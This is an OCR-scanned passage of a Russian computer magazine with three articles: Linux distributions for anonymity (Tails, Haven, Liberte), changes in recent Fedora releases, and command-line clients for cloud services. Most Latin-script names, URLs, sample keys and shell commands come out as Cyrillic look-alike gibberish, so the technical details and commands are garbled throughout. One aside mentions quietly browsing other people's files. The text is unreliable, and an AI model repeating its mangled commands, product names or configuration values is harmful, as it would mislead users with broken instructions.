собственной разработки для бпиРб, интегри- 
руемый с Маибіиз и позволяющий выполнять 
шифрование, создавать подписи и генери- 
ровать ключи с помощью контекстного меню 
(в Наѵеп те же функции выполняет инструмент 
БеаЬогзе). Также дистрибутив использует так 
называемые расширенные ТгиеСгурІ-тома 
(в собственной терминологии авторов проекта) 
для сохранения данных, накопленных пользо- 
вателем во время работы (например, настройки 
приложений, словарь ОрепОНіее, ключи бпиРб 
и т. д.). Всё это работает прозрачно и не требует 
каких-либо дополнительных действий со сто- 
роны пользователя. 

Кроме систем шифрования, дистрибути- 
вы могут включать в себя вспомогательные 
инструменты, которые помогают скрывать 
и защищать информацию от посторонних. На- 
пример, в набор приложений Таііз входит ин- 
струмент МАТ ( таТЬоит.огд ), который удаляет 
метаданные из файлов различных форматов 
(изображений, документов и т. д.), для того 
чтобы убрать из них любое упоминание об ав- 
торе. Наѵеп имеет еще более интересные воз- 
можности, например, он позволяет шифровать 
содержимое буфера обмена в один клик, что 
можно использовать для быстрой передачи 
малого объема данных (скопировал строку — 




иьегіе Ыпих собственной персоной 
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нажал на значок в трое — вставил в письмо). 
Менеджер файлов Маиіііиз, входящий в тот 
же дистрибутив, оснащен плагином, который 
предназначен для «полного» удаления файла 
через контекстное меню. Перед удалением 
файл забивается случайными данными, так что 
ни один инструмент восстановления данных 
не сможет его найти. 



АНОНИМУСЫ ИДУТ 



Обеспечение анонимности пребывания 
в интернете — третья важная особенность 
безопасного дистрибутива. Как и в случае 
с защитой данных, некоторые дистрибутивы 
подходят к решению этого вопроса радикаль- 
но. Например, ОЬипІи Ргіѵасу Ретіх вообще 
не позволяет выходить в Сеть, в том числе 
посредством ВІиеІооіЬ и даже ИК-модуля. 
Поддержка всего этого хозяйства намеренно 
удалена из ядра Ыпих, что позволяет пре- 
вратить компьютер в этакий бастион, который 
можно использовать для спокойной работы 
с важными секретными данными. 

Другое дело — дистрибутивы, в которых из- 
начально предусмотрена возможность выхода 
в Сеть. В них анонимность обеспечивается 
с помощью всем известного инструмента Тог, 
который пробрасывает соединение через 
множество сетевых узлов, так что его концы 
оказываются хорошо спрятаны. В обычной 
ситуации Тог прикидывается стандартным 
прокси, на работу с которым следует настроить 
браузер и другое ПО. Но как быть в ситуа- 
ции, когда через Тог необходимо пробросить 
абсолютно все соединения, так чтобы ни одно 
из них не утекло в Сеть обходным путем? 

Дистрибутивы Таіів и Наѵеп решают эту 
проблему очень просто: брандмауэр пере- 
направляет все соединения на Тог-прокси, 
исключая любые утечки трафика в обход 
«анонимной сети». Однако разработчик ЫЬегІе 
Ыпих предупреждает, что такой подход тео- 
ретически небезопасен, так как, инициируя 
соединение традиционным путем, приложение 
получает информацию о внешнем ІР-адресе 



машины и может выдать его в случае сбоя или 
по недосмотру разработчиков приложения. 

Поэтому в ЫЬегІе Ыпих применяется другой 
подход: все входящие в дистрибутив сетевые 
приложения настраиваются на работу через Тог 
(приложения, не умеющие работать с прок- 
си, запускаются с помощью обертки Іогі^у), а 
брандмауэр запрещает любые исходящие сое- 
динения. Такая схема позволяет избежать как 
утечки ІР-адреса, так и установления внешних 
соединений в обход Тог. При этом разрешены 
только следующие типы внешних соединений: 

• ОНСР-запросы и Тог-соединения с удален- 
ными НТТР(5)-портами; 

• ответы на ріпд при ограничении их количе- 
ства в секунду; 

• созданные пользователем ѴРМ-соединения; 

• соединения, инициированные специаль- 
ным «небезопасным браузером», который 
используется для регистрации вточках 
доступа. 

Передаваемые по ОНСР данные при этом 
сильно урезаются, а передача имени хоста, 

АРР и ІРѵ411 блокируется. Чтобы обеспечить 
приватность работы в локальных и ѴѴі-Рі- 
сетях, применяются рандомизаторы МАС- 
адресов. В некоторых дистрибутивах они 
доступны в виде опции, однако в ЫЬегІе Ыпих 
МАС-адрес генерируется динамически во 
время загрузки. 



СУРОВОЕ лицо 



Если говорить о пользовательском интерфейсе 
дистрибутивов для анонимусов, то здесь все 
очень прозаично: стандартные среды бпоте, 
ЕХОЕ или ЕІихЬох, набор стандартных прило- 
жений вроде ЕігеІ'ох, сіаѵѵз-ппаіі, АЫѵѵогсІ и т. д., 
плюс джентльменский набор ПО для ведения 
скрытой деятельности. Он-то нас и интересует. 

Некоторые стандартные приложения для 
безопасного времяпрепровождения мы уже 
рассмотрели в предыдущих разделах, однако 
на них список интересных софтин, конечно же, 
не заканчивается. Особенно любпытен в этом 



плане Таііз, в который разработчики пихают 
всё, что только можно представить, так как их 
не смущает большой объем дистрибутива. На- 
пример, в него входит графический фронт-энд 
для Тог-клиента Ѵібаііа [ ѵѵѵѵѵѵ.^огрго]есЕогд/ 
рго]есІ5/ѵісІаІіа ), который позволяет запускать/ 
останавливать Тог-демон, просматривать 
количество прошедшего через Тогтрафика, 
мониторить состояние демона и т. д. 

Дистрибутив включает в себя три расши- 
рения для браузера Рігеі'ох, обеспечивающие 
безопасность веб-серфинга: расширение 
ІогЬииоп, которое блокирует содержащийся 
на веб-странице активный контент вроде 
^аѵа5сгір^кода, РІазЬ и т. д.; инструмент 
РігеСРЗ ( деиігедрд.огд ), позволяющий при- 
менять дрд-операции к любым элементам 
веб-страницы, например, подписывать или 
зашифровывать выделенный фрагмент текста; 
расширение НТТР5 ЕѵегуѵѵЬеге ( ѵѵѵѵѵѵ.еІ'Еогд/ 



ОБМАНКА ДЛЯ 

ПОЛЬЗОВАТЕЛЕЙ 

ѴѴІМ00ѴѴ5 



При установке на флешку дистрибутив 
Наѵеп проделывает один интересный трюк 
с таблицей разделов, благодаря которому 
рядовой пользователь ѴѴіпсІоѵѵз не сможет даже 
найти систему на брелке. Дистрибутив создает 
дополнительный пустой раздел размером 
100 Мб в начале адресного пространства, 
а саму ОС и пользовательское пространство 
размещает в следующих разделах. ѴѴіпсІоѵѵз 
«не видит» остальные разделы, поэтому 
пользователю покажется, что на флешке 
ничего нет, а ее объем составляет 100 Мб. Для 
пущей убедительности в этот раздел можно 
накидать разных документов, а для отвлечения 
внимания — порнографических картинок. 
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Свобода через изоляцию 



Ьирз-еѵегѵѵѵЬеге ]. принудительно переклю- 
чающее браузер на использование протокола 
НТТР5, если сайт его поддерживает. 

Те же расширения идут в комплекте с дис- 
трибутивом Наѵеп, однако его арсенал ими 
не ограничивается. Здесь ты найдешь бонус 
в виде пяти дополнительных полезных рас- 
ширений: 

• РеІ^СопІгоІ — производит спуфинг НТТР- 
поля НТТР-геІ'еггег, скрывая отсайтов их 
доноры, тоестьсайты, с которых произошел 
переход. 

• СоокіеЗаІ'е — позволяет управлять уста- 
новкой кукисов в браузер для выбранных 
сайтов. 

• АсІВІоскРІиз — блокируетрекламу. 

• РериезіРоІісу — позволяет выявлять меж- 
сайтовыезапросы иуправлятьими (защита 
отС5РР-атак). 

• Регзресііѵез — позволяет проверять 
подлинность самоподписанных 551- 
сертификатов. 




иьегіе: Тог и ничего кроме 



Некоторые дистрибутивы также включа- 
ют в себя известный инструмент Аігсгаск-пд 
для исследования ѴѴі-Рі-сетей и генераторы 
паролей, устойчивых к подбору (например, 
РѴѴСеп в Таііз). Для безопасной переписки с по- 
мощью Х-сЬаІ используется расширение 6РА 
(6МІІ Ргіѵасу Аззібіапі: дра.ѵѵаісі.іпіеѵабоп.огд ). 
а плагин 5А51 ( ѵдгек.огд.иа/р/сар зазІ.ЬітІ ) 
обеспечивает анонимную переписку через Тог. 

В арсенале ЫЬегІе Ыпих также имеется менед- 
жер управления паролями Рідаго'з РаззѵѵогсІ 
Мападег 2 ( 1з.гедпеТс2Лрпп2/ ). который шифрует 
все сохраненные пользователем пароли с помо- 
щью алгоритма АЕ5-256. Интересная особен- 
ность почти всех безопасных дистрибутивов 
заключается в наличии экранной клавиатуры 
(РІогепсе: Логепсе.зТпеІ: ), которая использу- 
ется для обхода кейлогерров, внедренных 
в ядро или в какие-либо библиотеки времени 
исполнения. Фишка тут в том, что, в отличие 
отхардварной клавиатуры, нажатия клавиш 
которой перехватить проще простого, экран- 
ная клавиатура управляется мышью, которую 
бесполезно перехватывать — получишь только 




Графический инструментуправления Тог 



координаты точки на экране. Все приложения 
собраны с использованием инструментария 
НагсІепесІ бепіоо, предназначенного для сборки 
проекта. Этот инструментарий включаеттакие 
патчи, как 55Р (защита от переполнения стека 
и буфера) и А51Р (рандомизация распределе- 
ния памяти). 



ДРУГИЕ ИНТЕРЕСНОСТИ 



В этом разделе я хотел бы рассказать обо всем 
интересном и полезном, что не вошло в пред- 
ыдущие разделы. В основном это различные 
трюки и просто занимательные решения, 
использованные разработчиками дистрибути- 
вов. Одна из интересных особенностей Наѵеп 
заключается в том, что он не настраивает сеть 
автоматически. Предполагается, что если 
пользователю сеть не нужна, то лучше полно- 
стью избавить его от всех возможных проблем. 
После того как пользователь убедится в рабо- 
тоспособности демона Тог, статус которого ука- 
зывает значок в трее, он сможет самостоятель- 
но запустить сеть (то бишь МеІѵѵогкМападег) 
с помощью меню Арріісабопз -> 5іагІ Меіѵѵогк. 
Вторая занятная вещь в Наѵеп — это нали- 
чие полностью работоспособного комплекса 
Тог Ьгоѵѵзег ЬипсІІе (преднастроенная версия 
Рігеі^ох и демона Тог) для ѴѴіпсІоѵѵз. Ты в лю- 
бой момент можешь скопировать его в так 
называемый обманный раздел флешки (про 
него читай во врезке) с помощью одного клика 
мышью (Арріісаііоп -> Наѵеп -> Сору ѴѴіпсІоѵѵз 
Тооіз), передать флешку другу, и он тоже станет 
анонимусом. Наѵеп легко установить на другую 
флешку с помощью встроенного инсталлятора. 
Просто воткни брелок в свободный С15В-порт, 
выбери в меню пункт Арріісаііопз -> Наѵеп -> 
Наѵеп ІпзІаІІег, и дистрибутив скопируется 
на флешку. Естественно, без твоих личных 
настроек и данных. Кстати, по дефолту Наѵеп 
подключает все съемные носители в режиме 
«только чтение», что позволяет незаметно 
просматривать чужие файлы (время доступа 



не сохраняется). 

В ЫЬегІе Ыпих также есть несколько 
хитрых методов для защиты личных данных. 
Один из них — это блокировка экрана с помо- 
щью утилиты зіоск ( іооіз.зискіезз.ога/зіоск ). 
Но одной блокировки тут явно недостаточно. 
Чтобы взломщик не смог обойти блокира- 
тор с помощью комбинации <АК + Рх>, она 
запрещена в настройках сервера. На время 
лока также отключаются системные Ыпих- 
комбинации 5узРд, с помощью которых мож- 
но убить Х-сервер или перезагрузить машину. 
Вторая фишка ЫЬегІе — это так называемый 
«безопасный браузер», который использует- 
ся для регистрации в точках доступа. Браузер 
работает под управлением выделенного 
пользователя, имеющего минимальные права 
доступа, а также имеет собственные правила 
в ірІаЫез, разрешающие коннекты только 
на определенные порты веб-регистрации. 

Большинство безопасных дистрибутивов 
используют несколько методов зачистки жест- 
кого диска и памяти во время установки или 
завершения работы. Например, устройство, 
на которое происходит установка, полностью 
зачищается путем забивки области памяти 
нулями или случайными данными. Это нужно 
для того, чтобы убрать следы предыдущей 
установки или навсегда затереть конфиденци- 
альные данные. Для защиты от атак типа СоИ 
Ьооі, возможных благодаря тому, что после 
выключения компа информация в оперативной 
памяти сохраняется еще несколько секунд/ 
минут, память полностью затирается перед 
выключением. 



ВМЕСТО ЗАКЛЮЧЕНИЯ 



Собственно, на этом можно и закончить. Мы 
рассмотрели большинство технологий, ис- 
пользуемых в дистрибутивах для анонимусов. 
Теперь тебе решать — установить какой-либо 
из описанных в статье дистрибутивов или при- 
менить отдельные методики на своем компе. ^ 
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Максим «ЬаІсЬеІ» Полевой (такз.НаІсНеІйуапсІех.ги) 




счасть 



МИНИ-ОБЗОР ЗАСЛУЖИВАЮЩИХ 
ВНИМАНИЯ ИЗМЕНЕНИЙ 
В ПОСЛЕДНИХ ВЕРСИЯХ РЕООКА 





Последние версии дистрибутива Ресіога выделяются 
несколькими интересными и даже инновационными 
изменениями. Ребога 14 перешла на систему инициализации 
Зузіеппб, в Ребога 15 5ЕТ1Л0-бит в приложениях заменен 
технологией СараЬіІШез, в шестнадцатом релизе 
осуществлен переход на загрузчик 6Р11В2 и убрана система 
РІАІ. Разработчики также приняли решение в будущем 
пересмотреть структуру каталогов, которая почти не менялась 
со времен УМІХ. 

Рабочий стол Ресіога на основе Споте 3 




5У5ТЕМ0 



Стандартная система инициализации ЗузѴ, 
доставшаяся «пингвину» в наследство от СІМІХ, 
всегда обладала недостатком, порожденным 
ее же простотой. Она позволяла запускать 
набор системных сервисов во время загрузки 
и завершать их во время шатдауна, но не имела 
никаких средств для адекватного контроля 
их исполнения. В результате разработчикам 
приходилось идти на различные ухищрения, 
чтобы учесть последовательность запуска 
этих самых сервисов, оптимизировать загрузку 
ОС и контролировать исполнение демонов, 
которые имеют свойство периодически падать 
из-за нехватки ресурсов, 0о5-атак и ошибок 
в коде. Появилась разрозненная сеть сложных 
скриптов инициализации, попутно вызываю- 
щих множество подсобных утилит вроде сиС 
дгер, аѵѵк и им подобных. Она очень легко ру- 
шилась при малейшей модификации. В общем, 
простота породила сложность, которая с года- 
ми всё больше росла и мешала. 



В конце концов терпение разработчиков 
лопнуло, и они создали систему инициализа- 
ции Вузіетсі, которая решила все проблемы 
разом. Она стала контролировать последова- 
тельность запуска сервисов и их исполнение 
и даже позволила отказаться от громоздких 
скриптов, предоставив встроенные средства 
для подготовки сервисов к запуску. При этом 
первых двух целей удалось достичь весь- 
ма оригинальным и одновременно простым 
способом, а именно путем заблаговременного 
создания файл-сокета сервиса. 

Вузіетсі вошла в Ресіога 14 в качестве 
опции, но уже к следующему релизу преврати- 
лась в стандартную систему запуска/контроля 
сервисов. Ее поддержка была еще больше рас- 
ширена в Ресіога 16 (были переписаны многие 
устаревшие скрипты инициализации). 



САРАВІСІТІЕ5Ѵ5 5ЕТиЮ 



Исполняемые файлы с 5ЕТ11Ю-битом — бич 
всех НИКСОВ. Найдут в каком-нибудь ріпд дыру 



— и всё, система в опасности. А всё потому, что 
ріпд имеет 5ЕТШ0-бит, наделяющий его права- 
ми гоо\, которые нужны только для того, чтобы 
создавать сырые (РАѴѴ) сокеты. И не важно, что 
ріпд всеми средствами пытается ограничить 
время использования повышенных прав, ве- 
роятность ошибки — штука непредсказуемая, 
тем более что опасность несет не только ріпд, 
но и і\р и куча других софтин, гораздо более 
сложных и жадных до гооі-прав. Как снизить 
риски в этой ситуации? Использовать ЗЕЕіпих? 
Слишком толсто, особенно с учетом того, что 
многие пользователи не понимают и имеют 
привычку отключать его. Позволить софтинам, 
не имеющим прав гооС создавать РАѴѴ-сокеты 
и привилегированные порты? Еще большая 
дыра в безопасности. Ах да, у нас же есть шту- 
ковина под названием СараЬіІіІіез! 

Что такое СараЬіІіІіез? Это система деле- 
гирования повышенных прав «по кусочкам», 
своего рода аналог 5ЕТ1Л0, наделяющий, одна- 
ко, процесс не полными, а частичными правами 
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гооі, например, позволяющий создавать РАѴѴ- 
сокеты или устанавливать привязку к приви- 
легированным портам. Благодаря СараЬіІіІіез, 
ріпд'у можно дать права только на создание 
РАѴѴ-сокетов, и даже если взломщик найдет 
в нем дыру, он не получит ничего, кроме... да, 
права на создание РАѴѴ-сокетов. Какая досада, 
не правда ли? 

Первоначально механизм СараЫІіІіез поя- 
вился то ли в НР-ІІХ, то ли в АІХ. Он уже давно 
включен в стандарт Р05ІХ, однако о нем никто 
не вспоминал, пока не появилась возможность 
управлять привилегиями с помощью атрибутов 
файловой системы в ядре Ыпих 2.6.24. 





Установка Ресіога на Ыгіз 



КАТАЛОГОВАЯ СТРУКТУРА^ 



Еще одна интересная идея, предложенная 
для реализации в следующих версиях Ресіога, 
заключается в реорганизации каталоговой 
структуры, почти не менявшейся со времен 
иМІХ. Эта идея состоит в том, чтобы пере- 
местить все исполняемые файлы в /изг/Ьіп, 
отказавшись, таким образом, от каталогов /Ьіп, 
/зЬіп, /изг/зЬіп, а также от каталога /ІіЬ, всё со- 
держимое которого планируется перенести в 
/изг/ІіЬ. Нововведение это не только и не столь- 
ко косметическое, сколько глубоко практиче- 
ское. Дело в том, что, по мнению разработчиков 
дистрибутива, /Ьіп, /зЫп и /ІіЬ уже давно по- 
теряли свой смысл как каталоги для хранения 
базовой системы, которая может быть загруже- 
на, даже если каталога /изг нет на месте (в ста- 
рые времена его было принято подключать 
с помощью МР5). В то же время перемещение 
всех системных файлов в /изг позволит создать 
более гибкую систему, чтобы выполнять такие 
трюки, как, например, загрузка разных версий 
системы с помощью монтирования разных/изг- 
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разделов или, что еще круче, ЫгІ'-снапшотов. 

К сожалению, многие старые пердуны, 
привыкшие к миру и спокойствию и радею- 
щие за соблюдение традиций, высказались 
против этой идеи, подкрепив свои слова тем, 
что, дескать, есть стандарт Р5В и что придет- 
ся договариваться с разработчиками софта 
и другими дистрибутивостроителями, поэтому 
перспективы реализации описанной идеи пока 
еще туманны. 



ДРУГИЕ ИНТЕРЕСНЫЕ ИЗМЕНЕНИЯ 



В 15-ю версию Ресіога был добавлен демон 
ЯгеѵѵаІІсІ, позволяющий изменять правила па- 
кетного фильтра на лету, без перезагрузки всех 
правил и разрыва сетевых соединений. Так 
как для управления демоном служит протокол 
0-ВІІ5, им может воспользоваться любое при- 
ложение с соответствующими полномочиями. 
Для управления демоном из командной строки 
предусмотрена утилита ЬгеѵѵаІІ-стсІ, с по- 
мощью которой можно работать с правилами, 
отталкиваясь от имен служб, а не ІР-адресов 
и номеров портов: 

$ бгеыаіі-стсі --епаЫе --5егѵісе=5зЬ 
$ бгеыаіі-стсі --епаЫе \ 

--зегѵісе=5атЬа --1;ітеои1;=10 
$ бгеыаіі-стсі --сІізаЫе \ 
--зегѵісе=ірр-с1іеп1; 

В комплекте с той же Ресіога 15 идет рас- 
пределенная файловая система СІоисІРБ, пред- 
ставляющая собой расширенную редакцию 
виртуальной ФС бІизІегРБ, которая предназна- 
чена для развертывания распределенных фай- 
ловых систем. СІоисІРБ работает в пространстве 
пользователя, поэтому может быть легко 
установлена в других Ыпих-дистрибутивах для 
создания гетерогенного кластера. 

В Ресіога 15 также изменилась схема име- 
нования сетевых интерфейсов, которая теперь 
выглядит следующим образом: встроенным 
в материнскую плату ((е)тЬесІсІесІ (т)оіЬегЬоагсІ) 
сетевым адаптерам присваиваются имена етО, 
еті, ет2 и т. д., тогда как платы, подключаемые 
с помощью РСІ, получают имена вида рсі1#2, 
где 1 — номер РСІ-слота, а 2 — сетевой порт. 
Начиная с 15-й версии, Ресіога можно устано- 
вить на файловую систему ЫгІ'з средствами 
штатного инсталлятора. ВігІ^з отличается высо- 
кой производительностью и дружелюбностью 



к твердотельным накопителям (запись в ФС 
всегда производится в режиме СОѴѴ — копиро- 
вание при записи), а также имеет встроенную 
поддержку онлайн-снапшотов, что позволяет 
в любой момент создать снимоктекущего 
состояния ФС и откатить ее к предыдущему со- 
стоянию. В Ресіога 16 произошел переход на за- 
грузчик 6РСІВ2, отличающийся интеллектуаль- 
ным подходом к формированию меню загрузки 
(СРСІВ сам находитустановленные ОС/ядра 
и добавляет их в список), поддерживающий 
СІМІСООЕ и обладающий полноценным графи- 
ческим интерфейсом. Из системы также была 
полностью удалена прослойка НАР (Нагбѵѵаге 
АЬзІгасІіоп Рауег), вместо которой теперь ис- 
пользуется ибеѵ совместно с исіізкз и ироѵѵег, 
предназначенными для управления дисковыми 
накопителями (в том числе и для выполнения 
автомонтирования) и контроля питания. За счет 
удаления НАР удалось сократить время загруз- 
ки системы и ее реагирования на подключение 
внешних устройств. 

Ресіога 16 теперь содержит в комплекте ути- 
литу ѵігІ-запбЬох, предназначенную для запу- 
ска приложений в изолированном окружении. 

В отличие от зеІіпих-запбЬох, новая утилита 
может использовать для формирования «пе- 
сочницы» любую технологию, поддерживаемую 
библиотекой ІіЬѵігр например контейнеры РХС 
или виртуальную машину ОЕМРІ/ѴігІиаІВох. 

Дистрибутив теперь поддерживает тех- 
нологию безопасной загрузки Тгизіеб Воор 
гарантирующую неизменность ядра и си- 
стемных компонентов во время загрузки ОС 
и, таким образом, предохраняющую систему 
от различных руткитов и другого вредоносного 
ПО, внедряемого непосредственно в ядро ОС. 
Для реализации технологии в систему был до- 
бавлен специальный модуль, вызываемый еще 
до загрузки ядра, однако он бесполезен без 
соответствующей аппаратной поддержки. 

Также реализована система проброса 
СІБВ-устройств на удаленные машины, которая 
позволяет обеспечить, например, доступ к ѵѵеЬ- 
камере с другой машины. Система работает 
на основе интегрированного в Ресіога 14 про- 
токола удаленного доступа Брісе и виртуаль- 
ной машины ОЕМСІ. Проброс происходит в два 
этапа: сначала на виртуальную машину, а затем 
на удаленную, где осуществляется обратная 
процедура проброса устройств на реальную 
машину. ^ 
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Евгений Зобнин (іоЬпіпйдтаіІ.сопп) 




ДОСТУЧАТЬСЯ 

|_ІОПО/^ ИНТЕГРИРУЕМ имих 
П и «ОБЛАЧНЫЕ^^ СЕРВИСЫ 

Все мы медленно, но верно переходим к работе во Всемирной паутине, забывая 
привычные настольные приложения. Современный мир немыслим без бппаіі, 

УоиТиЬе, бОосз и огромного количества веб-сервисов, заменяющих нам обычные 
программы. Но так ли нужен веб-браузер, чтобы пользоваться «облачными» 
приложениями? 




ВВЕДЕНИЕ 



Какой должна быть операционная система, 
полностью завязанная на «облачные» при- 
ложения? Такой, как ОС-браузер, например 
боодіе СЬготе 05? Или, может быть, такой, как 
пресловутый Р1ап9, не делающий различий 
между локальными и сетевыми ресурсами? 

Нет, скорее всего, она будет представлять 
собой нечто среднее между ними, то есть опе- 
рационку, позволяющую «ходить в „облака"» 
и тем и другим способом. 

Подвижки в создании подобной ОС нача- 
лись уже давно. Те же стандартные окружения 
рабочего стола для Ыпих уже научились син- 
хронизировать данные пользователя с «облач- 
ным» хранилищем (ОЬипІи Опе), проигрывать 
видеозаписи изУоиТиЬе в окне стандартного 
медиапроигрывателя (Тоіет, например, умеет 
это уже несколько лет), выводить информацию 
с веб-страниц на рабочий стол (виджеты КОЕ 
и Ооодіе Оасідеіз) и использовать множество 
других способов интеграции с веб-сервисами. 
В этой статье я расскажу, как еще более 
расширить границы соприкосновения веба 
и обычного Ыпих-десктопа. Мы рассмотрим 
множество приложений для работы с «об- 
лачными» сервисами, попробуем достучаться 



до «облаков» из командной строки и пре- 
вратим файловую систему в инструмент для 
работы с «облаками». 



КЛИЕНТЫ «ОБЛАЧНЫХ» СЕРВИСОВ 



С веб-сервисами не всегда удобно работать 
из окна веб-браузера. Тот же Тѵѵіиег, напри- 
мер, на широком экране занимает максимум 
полстраницы, а вытаскивать окно Твиттера 
из браузера, подгонять размер этого окна 
и следить за тем, чтобы случайно его не за- 
крыть, долго и неудобно. К тому же панель 
навигации будет мешать. Гораздо круче 
посадить Твиттер в трей, чтобы он показы- 
вал новые сообщения в виде всплывающих 
подсказок. Как это сделать? Да просто 
воспользоваться одним из Тѵѵіиег-клиентов. 
Почти для каждого популярного веб-сервиса 
для Ыпих есть созданный энтузиастами 
клиент. Среди Тѵѵіиег-клиентов наибольшей 
популярностью пользуется СѵѵіЬЬег, кото- 
рый, помимо Твиттера, поддерживает еще 
и Иепіі.са, ЗіаІизМеС РасеЬоок, РІіскг, Оідд, 
РгіепсІРеесІ и Оаіки. Приложение это, надо 
сказать, на любителя, так как оно очень тя- 
желовесное и зависит от различных Споптіе- 
библиотек. Поэтому ценителям аскетизма 
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Вот так, легким движением руки, любой сайт можно превратить в десктопное приложение 



Создаем пароль для нашего Соодіе-приложения 



я бы порекомендовал посмотреть в сторону 
Ріпо или Ноіоі. И тот и другой доступны 
в любом дистрибутиве, так что установить их 
и попробовать в деле не составит труда. Осо- 
бого внимания также заслуживает ТѵѵееШеск 
— стильный Тѵѵіиег-клиент, который особо 
ценят пользователи маков. Одна беда — он 
требует АсІоЬе АІР, что неприемлемо для 
многих юниксоидов. Поклонники ІМ-клиента 
Рібдіп должны обязательно обратить внима- 
ние на Тѵѵіиег-плагин для своего фаворита 
(он так и называется — рібдіп-іѵѵіиег). Это 
даже более удобный и удачный вариант, не- 
жели полноценное приложение: всё в одном 
месте и никаких лишних окон. Поклонники 
консоли также не останутся без вкусного. 

В репозиториях дистрибутивов предостаточ- 
но Тѵѵіиег-клиентов с интерфейсом команд- 
ной строки или псигзез. Один из самых 
простых и удобных написал всем известный 
Ыпих-разработчик Огед КгоаЬ-НагІтап. Этот 
клиент называется Ыі и может быть исполь- 
зован, например, так: 

$ есбо "Му сиггепі; иріііте із 'иріііте'" | Ыіі 

Однако, чтобы начать использовать это 
маленькое чудо, придется поизвращаться 
с ОАиіЬ-аутентификацией, которую исполь- 
зует Твиттер. Для начала в разделе разра- 
ботчика приложений Твиттера ( іѵѵіиег.сопп/ 
аррз/пеѵѵ ) необходимо получить Сопзитег Кеу 
и Сопзитег Зесгеі и вписать их в конфиг Ыі: 

$ ѵі 

# Сопзитег кеу 

сопзитег_кеу=с2у80сІіо5ыА-РиЗІЗУ§6Е2ы 

# Сопзитег зесгеі: 

соп5итег_5есге1:=■РпIСС^0Т12тМ1лIК^тТI^^сI5еКN 
32МИлІ-Ртпыарѵ\/иЬѴО 

Далее следует запустить Ыі. Он напеча- 
тает на экране адрес страницы, на которой 
ты сможешь получить РІМ. Его необходимо 
ввести в ответ Ыі, после чего на экран будут 
выведены ассезз_Іокеп_кеу и ассезз_Іокеп_ 
зесгеС которые точно так же придется до- 
бавить в конфиг. Далее Ыі должен заработать, 
и с его помощью можно будет отправлять 
сообщения прямо из командной строки. 

Для УоиТиЬе также существует несколько 



интересных клиентов, как графических, так 
и консольных. Пользователи среды Споте 
получают один из таких клиентов в комплекте 
с плеером Тоіет. Пользователи К0Е4 для тех 
же целей могут использовать плеер тіпіІиЬе, 
позволяющий просматривать, искать видео 
и составлять плей-листы. Программа не за- 
висит от библиотек КОЕ, поэтому подойдет 
также приверженцам более экзотических 
графических сред. Особого внимания за- 
служивает консольный скрипт уоиІиЬе-ѵіеѵѵег, 
позволяющий искать и просматривать видео 
с помощью штатного МРІауег. 

Просто запусти уоиІиЬе-ѵіеѵѵег, введи 
поисковый запрос, и на экране появит- 
ся пронумерованный список из двадцати 
первых совпадений. После ввода номера 
нужного ролика он незамедлительно начнет 
проигрываться в полноэкранном режиме. 
Скрипт можно использовать для получения 
списка самых популярных роликов за день 
(флаг ’-С), списка самых популярных роликов 
за всё время ('-а'), поиска плей-листов ('-р') 
и фильмов С-М'). Для указания предпо- 
чтительного качества видео предусмотре- 
ны флаги '-2', ’-З', '-4', ’-Ѵ (240р, ЗбОр, 

480р, 720р и 1080р соответственно). Также 
с помощью флага '-зиЬ=ги' можно пере- 
ключить МРІауег на использование русских 
субтитров. Чтобы скрипт выводил больше 
результатов поиска (50 вместо 20), используй 
флаг ’-т'. Скрипт уоиІиЬе-ѵіеѵѵег может стать 
настоящим открытием для любителей смо- 
треть ролики сУоиТиЬе. Найти и запустить 
видео с его помощью можно за считанные 
секунды, а МРІауег обеспечивает гораздо 
более высокое качество картинки. Скрипт 
особенно актуален при просмотре НО-видео, 
с которым ЛазЬ-проигрыватель справляется 
плохо, а МРІауег гоняет его без какой-либо 
значительной нагрузки на процессор. Стоит 
отметить, что сама скорость загрузки видео 
также повышается (это проверено экспери- 
ментальным путем, но с чем связано, неяс- 
но). В качестве альтернативы уоиІиЬе-ѵіеѵѵег 
можно использовать ѵісіеоіор, имеющий при- 
митивный псигзез-интерфейс с ѵі-подобным 
управлением. Однако он имеет колоссальный 
недостаток: требует полной загрузки видео 
до начала просмотра. Что касается других 
сервисов поискового гиганта (я сконцентри- 



ровался на них из-за популярности, а не лич- 
ных пристрастий), то здесь можно выделить 
несколько интересных приложений. Во- 
первых, это множество самых разнообразных 
«уведомлялок» для бтаіі, лучшими из ко- 
торых являются СЬескбтаіІ и бтаіі МоІіПег. 
Обе выполняют одну простую задачу — сидят 
в трее и выводят сообщение при получении 
письма. По клику происходит переход на сайт 
бтаіі. Аналогичная штуковина для КОЕ4 
называется кберІазта-дтаіІпоІіЛег. Она, 
в отличие от двух упомянутых выше програм- 
мок, может висеть не только в трее (а точнее, 
на панели), но и на рабочем столе и вообще 
где угодно, куда КОЕ позволяет засунуть 
плазмоид. Также есть полноценные клиенты 
для работы с почтовой службой. Из наиболее 
интересных я бы отметил консольный зир, 
почти полностью копирующий интерфейс 
легендарного почтового клиента Мии. 

Среди утилит командной строки можно вы- 
делить скрипт Ігапзіаіог, который просто пере- 
водит слово/фразу/предложение на указанный 
язык, и сІіѵѵеаіЬег, печатающий текущую 
погоду для указанного места земного шара. 

Оба очень просты в использовании и идеально 
подходят для интеграции в различные скрип- 
ты или, например, создания уведомлений 
с помощью поііі'у-зепсі: 

$ поііі-ру-зепсі Погода \ 

’сііыеаііііег ИНДЕ КС -ГОРОДА' 

Команду можно прописать в скрипте 
и повесить на горячую клавишу или вклю- 
чить в задание сгоп (хотя, конечно, удобнее 
использовать один из множества апплетов для 
отображения погоды в трее). 

Нельзя оставить без внимания и набор ути- 



УСТАНОВКА С0061Е ООСБ 

Р5 В увинти 



$ зисіо асІсІ-ар1;-геро5І1;огу рра ісІосТогто/рра 
$ зисіо ар1;-§е1; ирсІаТе 
$ зисіо арТ-^еТ іпзТаІІ §оо§1е-сІосз--Рз 
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иміхот 



лит под названием ЗОаІаСоріег, предназначен- 
ный для работы с Соодіе Оосз. Пакет включает 
в себя пять простых утилит: діз для просмотра 
списка документов, дер для копирования до- 
кументов с локальной машины и на нее, дтксііг 
для создания каталогов и утилиты дгт и дтѵ 
для удаления и перемещения документов со- 
ответственно. Пользоваться всем этим добром 
просто и приятно. Например, для просмотра 
всех документов из папки «Работа» делаем 
так: 

$ §І5 изегпате@§таі1.сот:/сІос5/Работа 

Для их экспорта в формате РОР на локаль- 
ную машину — так: 

$ §ср --Р рсІ-Р \ 

изегпате@§таі1. сот:/с1ос5/Работа/* /1:тр/ 
Для создания каталога — так: 

$ §тксііг \ 

и5егпате(а)^таі1.сот:/сІос/Новая_папка 

Конечно же, нельзя забывать и о контроль- 
